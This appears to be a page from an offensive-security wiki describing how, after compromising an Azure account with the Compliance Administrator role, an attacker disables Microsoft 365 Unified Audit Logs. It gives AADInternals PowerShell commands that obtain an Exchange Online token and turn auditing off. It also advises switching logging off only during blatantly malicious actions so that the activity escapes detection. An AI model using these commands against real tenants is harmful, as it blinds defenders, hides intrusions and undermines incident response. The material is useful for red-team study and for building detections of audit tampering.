Disabling Auditing (Unified Audit Logs)

Azure's audit logs provide the vast majority of logging in the tenant and can be easily used to figure out what has been compromised and how the attack was carried out but if we manage to compromise an account with the Compliance Administrator role we can disable the audit logs.

A smart thing would be to disable logging only when carrying out blatantly malicious actions and enable it again when performing tasks that could easily blend in with normal user activity.

To perform this technique we'll need an access token for Exchange Online

PS /home/otter> Get-AADIntAccessTokenForEXO -SaveToCache
PS /home/otter> Set-AADIntUnifiedAuditLogSetting -Enable False
# check if changes took place
PS /home/otter> Get-AADIntUnifiedAuditLogSetting | Select Unified*

As the CLI will show, the changes might take up to 1 hour to go through.

PreviousMalicious Device Join NextSpoofing Azure Sign-In Logs

Last updated 4 months ago